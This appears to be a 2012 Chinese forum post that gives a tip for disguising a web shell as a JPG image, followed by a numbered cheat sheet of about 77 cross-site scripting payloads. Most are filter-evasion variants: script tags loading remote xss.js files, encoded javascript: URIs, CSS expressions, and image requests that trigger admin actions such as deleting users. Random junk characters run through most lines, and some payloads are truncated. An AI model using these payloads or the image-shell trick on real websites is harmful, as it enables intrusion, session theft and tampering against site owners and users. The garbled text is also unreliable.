跨站图片shell
, b! u/ K3 B: v* |XSS跨站代码 <script>alert("")</script>
K( g ?0 ^. u
# T/ w5 c; I) h将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马; I+ d* V( M1 z& m- t4 ]8 V) N
+ }" b, s2 {, Z" A
' |; T! w% c! V
+ z* d' O y8 V1)普通的XSS JavaScript注入0 t8 A! y: C% \1 Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 v# r- m+ \ r6 O0 E0 G
) k7 y) H' G- Q1 m( j(2)IMG标签XSS使用JavaScript命令
; I, Z$ E3 h6 m- l5 r& h. O& E<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 {& q Q, u2 l3 b- K- L g4 }0 Z! J; [% j+ X
(3)IMG标签无分号无引号5 W4 f3 z' i0 z0 V# `& V3 {
<IMG SRC=javascript:alert(‘XSS’)>- n0 J/ v( J2 c
! Z5 |5 r [% a1 }" q" O* R
(4)IMG标签大小写不敏感
! q- @, Q! `2 g<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 S" d0 W$ Y* o3 E& R3 v$ r% i# G* X' X# {6 S9 X$ O& w! ~
(5)HTML编码(必须有分号)/ o1 S+ y8 w6 O# R% v) Q' ]$ A
<IMG SRC=javascript:alert(“XSS”)>
5 \5 r, b6 e0 L( G% h4 ]0 L F4 M9 T( O2 m: ]; Y6 }. ?) m% k: G9 F+ I
(6)修正缺陷IMG标签
% g! U, r! Z5 h* ?<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 |3 H) D$ q" K L" E5 f
0 O. x+ n$ b7 f2 e& E(7)formCharCode标签(计算器)6 p8 [* H3 e6 s
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) d1 g: v; V! S; n/ \& E; R, T$ B- ?% V- a4 T- \) g( T4 o
(8)UTF-8的Unicode编码(计算器)# v8 D4 S* e) n* v( c4 t
<IMG SRC=jav..省略..S')>$ e' j/ u7 A! |8 O
8 U6 H2 t+ J$ e7 h$ m5 X(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# a3 f+ c' W: F6 a6 H, ^
<IMG SRC=jav..省略..S')>) P, F2 g0 J1 w- L
# H( A; ~# n- g& O. Z, G
(10)十六进制编码也是没有分号(计算器)9 Z w) ?5 w* X
<IMG SRC=java..省略..XSS')>! \0 M% ~% [% K* j& B) Y' @
4 W; F, g* [0 s; e. e) \(11)嵌入式标签,将Javascript分开4 \! S0 R4 q7 v9 d, H9 m
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& u5 u) M! u E. C- k0 b: @
! l5 ?; D6 W- H9 X. |# `(12)嵌入式编码标签,将Javascript分开+ _6 }' S3 a/ }( H1 U h( S3 e% {
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" k; s; ^6 [$ o
" P+ G. k2 o3 @. \2 J(13)嵌入式换行符
* ?* A4 q0 v4 W4 H" V) ~9 g+ @ a9 L<IMG SRC=”jav ascript:alert(‘XSS’);”>
: O- t! f) ?5 a0 G5 Z7 D
6 F6 i! B( q) ]+ G0 `* K; w(14)嵌入式回车& E J* H) C. r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% I/ L# P( a; I0 l) C. L5 g- y! T
* b( R5 {- }7 y+ m* v! l6 D(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 G, m4 V" L5 f( x0 ]6 X<IMG SRC=”javascript:alert(‘XSS‘)”>+ ?& x: M8 u/ j- G$ B5 d
/ y$ `2 O. P, g9 \! C% f- X$ I(16)解决限制字符(要求同页面)$ K0 \) h5 m R
<script>z=’document.’</script> j8 {& n$ t4 X& k; [7 T, ~
<script>z=z+’write(“‘</script>
. ^1 S/ F1 N C0 S<script>z=z+’<script’</script>: C6 z+ t2 @1 G# o! n1 I$ Z) Z
<script>z=z+’ src=ht’</script># x6 l" }; |/ W' r, E
<script>z=z+’tp://ww’</script>
6 p) o: L: H T, o2 q<script>z=z+’w.shell’</script>
6 R1 t5 S; F" F4 i<script>z=z+’.net/1.’</script>; F- U6 a; Y7 N
<script>z=z+’js></sc’</script>
& E6 F) r2 T. x E$ V4 f0 l<script>z=z+’ript>”)’</script>' A6 M7 b b( f7 b% N
<script>eval_r(z)</script>
1 n5 y1 P' e0 b# l7 l
, h% Y5 t5 F; f' P" @+ p4 ?(17)空字符
! y; Z9 [: i" N- ]5 w2 V4 t0 M" V0 y0 uperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( R1 ^& Z; i5 c9 V/ `
$ ?9 R% \2 B/ T7 c& Y {4 C+ c(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( w9 ?1 _$ K0 g1 j' c7 b
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 r- P$ b$ R% s& }$ k+ E
! |1 h3 z6 r( Y1 q(19)Spaces和meta前的IMG标签, B+ x6 y. T: X4 q4 \! o1 j# r7 }3 `
<IMG SRC=” javascript:alert(‘XSS’);”># t# X; [2 U% X5 H( P& E& y
- d( \+ v& j7 L- m5 U
(20)Non-alpha-non-digit XSS
8 H+ o3 O; w6 F5 v<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( _. J# i- M; O$ s" M
. h- b6 f: k7 @% _
(21)Non-alpha-non-digit XSS to 2
8 y$ t( T! J) i8 X: j* s0 O, s<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 n6 t( L& u& b6 Q1 r+ Q7 S X$ a/ q
(22)Non-alpha-non-digit XSS to 3( j9 M( P% o: q" m% J
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ u% r9 `% z4 y
- n# O9 D$ ?# n o7 W(23)双开括号5 J& g( @. }+ l& F2 U
<<SCRIPT>alert(“XSS”);//<</SCRIPT>' N* n6 U: p9 F3 p& e2 n
5 I7 i6 s% g* p
(24)无结束脚本标记(仅火狐等浏览器)
& }- S5 A: q( C4 A% i5 b<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>& y$ X: O! O/ @6 \; g$ i
6 P0 f1 C( v/ u
(25)无结束脚本标记2
( t7 H6 ?* Z+ s. C" |" }<SCRIPT SRC=//3w.org/XSS/xss.js>
$ D# z% I! A+ d8 @" v5 ^, @0 j# G9 h8 ^% Y2 ~0 I
(26)半开的HTML/JavaScript XSS r( a8 i' M) v1 L! K: W k; Q
<IMG SRC=”javascript:alert(‘XSS’)”# G9 h% W0 u/ s* c
7 ^7 O9 p' F$ B5 W6 _; h1 ~
(27)双开角括号" I4 k9 |2 ~, r( k8 ^% D$ w& ]. v
<iframe src=http://3w.org/XSS.html <- R, C7 J% p2 _" S
3 q5 @% v$ S' `5 b2 o2 Q8 m(28)无单引号 双引号 分号
! s% t1 a+ G( Y1 _: b. b2 U& F: S<SCRIPT>a=/XSS/
. y1 k1 V9 L# N p' v7 salert(a.source)</SCRIPT>
' o) P4 S0 P4 `3 o! U$ W
, l9 u' p t! f+ |(29)换码过滤的JavaScript8 {7 |" U( `. s- v2 `8 H* S
\”;alert(‘XSS’);//, ]$ F# M( h/ Y' q( m5 Q( s+ K
2 B8 a6 M- i( v0 g0 o
(30)结束Title标签7 s- A$ N, P1 Q9 S# {8 u$ @& ^7 ^
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: c) b" O$ N. f3 `
, |2 e- r: {& d- |: u& N
(31)Input Image
; K6 `+ V7 W2 o! v( k<INPUT SRC=”javascript:alert(‘XSS’);”> N" I N) a; ]0 A/ r7 [
; ]2 u, L& \% C+ H$ F1 h' W/ q9 N(32)BODY Image
9 i5 X9 `! C0 ]; s8 _ n<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 C' _& E% h# }0 ^
( @" ]3 N) D# K7 Q# P
(33)BODY标签
$ |3 f- Z% D# x8 f<BODY(‘XSS’)>
5 U: U& w5 P5 r f, O2 T! I* m |3 R+ K5 p9 t9 O5 P% _
(34)IMG Dynsrc( a, b+ o3 f/ f
<IMG DYNSRC=”javascript:alert(‘XSS’)”>; s) T" K k2 ?* U. n
3 z% ?6 X# ?/ M. z/ l. Z. ^(35)IMG Lowsrc
& d% g$ X$ | b0 N, M<IMG LOWSRC=”javascript:alert(‘XSS’)”> `) Y. |, u4 Q. o# \
8 L6 I# J* G* P* \(36)BGSOUND% W- e; }: M9 t3 `- k
<BGSOUND SRC=”javascript:alert(‘XSS’);”>- C5 x( z! q& F9 J$ a f9 Y- K& k
+ o2 L" L1 x. n* b# l
(37)STYLE sheet
' B0 M( M8 {* S<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
O p& ?+ ^+ T3 G1 g# t0 @4 y
4 C3 x/ h9 g% W+ W# T0 N: F3 I(38)远程样式表
% I6 `4 ~8 p) ~1 f) O<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( A0 s# z$ Y5 f9 B7 r
% V1 G' q' ]$ \3 V(39)List-style-image(列表式)7 x& s- H6 g1 r9 X: ]# ]
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS& _* C: e7 O9 w
3 V" Q% K0 i" F$ }! a8 P# _, j(40)IMG VBscript
" w+ w% m$ }: |/ L<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 p9 \# @% A$ u5 [) U3 a# q4 S# X' e# A3 d- y2 v5 X" w
(41)META链接url6 j# x( N2 ^( ~! }" R; I1 c/ @0 }" [* H
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- W# l- E; R/ d' p( M5 W$ Y9 E. F5 J" t; ^+ F
(42)Iframe
( r( x" O4 ]& a# ?, h+ [9 G<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 @0 J, t8 p+ F* }2 j(43)Frame& i7 w- v! \& Q( T
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET># i. H( u0 R, z: h
: C2 \: H. \, t5 {: V% Q(44)Table
" z8 P% X* O% @4 a# p. b$ H. @5 c<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) I% e3 g+ q4 Z2 C# U1 h& K8 y+ P I
(45)TD
5 D; j1 F. H- q. P! `' @<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* @* \+ x A7 P. N1 Z& B2 f7 A- b7 G }1 p+ S
(46)DIV background-image
4 M+ o7 T5 ~ }! T- |<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 X$ f1 C+ t# u2 F% t
) H6 e# c* `* ]8 ](47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. N: Y- I1 k6 W t<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
" n: u! Q: B+ a+ i# F8 J) z( L$ z, P( d* t
8 a: ? a3 A' u' b(48)DIV expression/ M3 t2 C- E$ \
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) |5 Y' p6 I! O
! q9 T0 R4 [7 ]5 f4 L! a7 g(49)STYLE属性分拆表达
. F: [3 Z7 \; H k N<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 r) }& F" }+ l) A4 Z. ]- x3 b7 ^% \ Y, x& ?! p$ O2 d5 c5 f
(50)匿名STYLE(组成:开角号和一个字母开头)
8 R9 \% Y' M0 W4 B/ r' G* ]<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 i2 H1 D1 w7 g8 T/ p j+ M
0 |) B6 [# h. i; G
(51)STYLE background-image
& f# m# p+ d6 a J( H+ }/ O* }<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" m& Q$ b0 V8 o1 U0 `! E
" N1 T0 d% t$ T(52)IMG STYLE方式, H$ M" _! o7 _9 k# S- O; e
exppression(alert(“XSS”))’>) \ b9 {& J' S6 I7 Q
0 v0 G2 U6 O+ G. f
(53)STYLE background
9 I$ a( N" @0 Q7 x% }6 F5 e<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE># F0 O2 ]% c$ Y% b( V4 n
) F* T9 L2 T1 q5 n+ Q
(54)BASE" X2 H" S- b1 U0 E
<BASE HREF=”javascript:alert(‘XSS’);//”>
: H- ?) X& T* n0 `* u0 I" I+ z. G8 y3 [$ m. C6 u
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 E g4 L2 J2 D<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 q1 \( g, N; A4 y2 C
0 J2 v6 f, j- `
(56)在flash中使用ActionScrpt可以混进你XSS的代码
; h2 _5 V; m6 ~! ia=”get”;3 B" q" Z2 ?2 T. w( b' h; x
b=”URL(\”";
/ Z* y- w+ U/ @ F! a8 mc=”javascript:”;: ]; P6 B2 W' z3 d0 L/ ]7 t0 C
d=”alert(‘XSS’);\”)”;# t* l( B# Z, e# y$ B& ~6 C
eval_r(a+b+c+d);! E6 }5 j- s, w3 K8 K) A
( Z0 }; Z, r" N2 w0 d(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上1 g. K, S6 Z' n+ ~
<HTML xmlns:xss> N3 R3 T4 S3 T5 h$ c
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' m0 U2 {- |2 Q: @/ u% A0 g<xss:xss>XSS</xss:xss>7 L5 T& `. V# x- n1 \
</HTML>
p& f* f9 o$ Q6 r* A
* p9 g6 q3 t+ ~% P- U(58)如果过滤了你的JS你可以在图片里添加JS代码来利用: z! ` ~( q. z9 o1 N- E8 T9 b) l) j
<SCRIPT SRC=””></SCRIPT>) d% Z) o7 O/ |9 P: S& k9 L$ {$ x8 \! v
( t7 N, o/ [2 y& u* b" i; K- m: f b(59)IMG嵌入式命令,可执行任意命令
* @% }2 [& ]7 n: V3 O* [8 k! n& M n* p9 s<IMG SRC=”http://www.XXX.com/a.php?a=b”>* n9 h4 B y% b% S0 q* `" \
! W+ D' ~7 l1 {2 ^( O$ v(60)IMG嵌入式命令(a.jpg在同服务器)
/ g$ I9 [( D5 D2 t% J! G( hRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( d+ ?/ E2 Y9 n2 w: k: t" ^! `
2 y% f8 G. E' W. K; f(61)绕符号过滤
+ K+ k9 @+ E, v/ T. X<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ d1 B$ H" R+ y: X
! B& p7 Q0 j6 M* x6 @* H; p+ S(62)
t ?+ O( ?2 a% D6 G! c<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, p9 o L1 H7 D$ F [0 p
' J: q. U$ K9 v4 g0 R+ p- q
(63), l/ e. ^- V! F4 G9 E! A5 `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT> m5 D+ x/ e* H
2 V3 T, h: m: `& t# c8 T(64)
3 B% \1 h2 h% z# Q' V5 A, ?2 V<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 R2 ~9 B0 T1 D9 F# ~1 F- n" `+ ~% B0 }9 B! A5 G
(65)
% Y1 ^4 r3 r% @1 E# p6 a+ ?8 x: |( B<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: e: t! `. F$ @5 h- U0 r4 b
_; K5 Q! L% w. x+ f. |' a. p
(66)
" S# ?2 o* T B/ o3 W: b' o<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ o5 G) w0 b1 ^7 v' r8 n
$ _; ]9 A5 e: N; k, _(67)! ?0 z' i, X; `. _* [6 M5 }0 Y/ h
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: X5 w8 F1 \% J& U9 j, S
; k; B5 n+ R: X2 N' \(68)URL绕行
" e/ I) G2 S# F0 Q<A HREF=”http://127.0.0.1/”>XSS</A>
2 L+ B! J( w2 L' U
7 e( X: s* ~7 ]2 `(69)URL编码( c8 |* K% v/ B
<A HREF=”http://3w.org”>XSS</A>
/ @ `1 ~* u1 L- a, z
; \2 q! J# a0 N5 R8 |. h(70)IP十进制
- I- {, \$ g( w<A HREF=”http://3232235521″>XSS</A> j. I5 O6 |: j, ]6 ~$ m( z& e* k6 M# x
7 p% p/ C; c' c' j- S! D% B U9 K
(71)IP十六进制
/ q( P& w) f+ u" R6 J" ~8 a' x" N* ]<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>( z3 h6 p3 b) g, h3 N @/ f( ~2 A
4 ]) v/ a' u0 A) o% W( F3 t7 g(72)IP八进制* {, i/ U9 M/ c
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 F1 m+ k$ }) r
& ^, s3 h" W: s9 W4 ](73)混合编码
6 r7 U( E/ \$ K5 l- v<A HREF=”h3 `1 W6 e9 v% y; P
tt p://6 6.000146.0×7.147/”">XSS</A>
0 t4 ~2 |1 }& i9 L& i a' d; Y- y; K8 x% ~, m
(74)节省[http:]
" x5 l% U. P6 f. G- g' j<A HREF=”//www.google.com/”>XSS</A>
1 t1 w8 _. j8 r8 D" k/ s! X0 O/ c- T' `8 Z
(75)节省[www]
# @' s% R8 N$ I6 t6 ]( e<A HREF=”http://google.com/”>XSS</A>
2 j" R( r" c& u( n' v; ~
/ C3 O" r6 ~( ~(76)绝对点绝对DNS9 Q7 \! z* q- c) Z% |* n6 y
<A HREF=”http://www.google.com./”>XSS</A>1 d" \8 W3 ]* u; e: [$ [
% h+ R# ^) W+ L8 L) V5 L
(77)javascript链接
! D9 `) Z) }) O$ B+ e<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- d$ ~2 o# C7 Y! G( q( s |
发表于 2012-9-13 17:04:56
收藏
支持
反对